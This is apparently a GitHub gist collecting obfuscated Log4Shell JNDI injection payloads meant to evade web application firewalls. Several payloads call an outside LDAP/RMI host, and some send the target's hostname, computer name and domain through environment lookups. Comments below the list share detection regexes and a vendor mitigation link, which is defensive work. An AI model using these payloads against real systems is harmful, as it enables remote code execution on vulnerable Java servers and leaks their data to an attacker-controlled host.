Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
@kek-Sec
Copy link

kek-Sec commented Dec 13, 2021

Got any regex that covers these cases?
I've got the following 2 together but they seem to be weak.

var jndiRegex = @"$({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+";
var obfuscated_regex = @"/(?:$|%24)(?:{|%7b)[^\w]?j[^\w]?n[^\w]?d[^\w]?i[^\w]*?(?::|%3a)/i";

@sin9yt
Copy link

sin9yt commented Dec 13, 2021

This is the best I could find at the moment, https://twitter.com/egglessness_/status/1470184935730434050

@norwayfinland
Copy link

norwayfinland commented Dec 13, 2021

I wrote this PCRE; I am it's author. I found it matches all evasion samples shared above. Good luck - Nathan Fowler!

/[uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]+[Jj][uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]*[Nn][uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]*[Dd][uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]*[Ii]/

@WLDDZ
Copy link

WLDDZ commented Dec 14, 2021

You can find the implementation of F5 in the following link https://support.f5.com/csp/article/K19026212

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment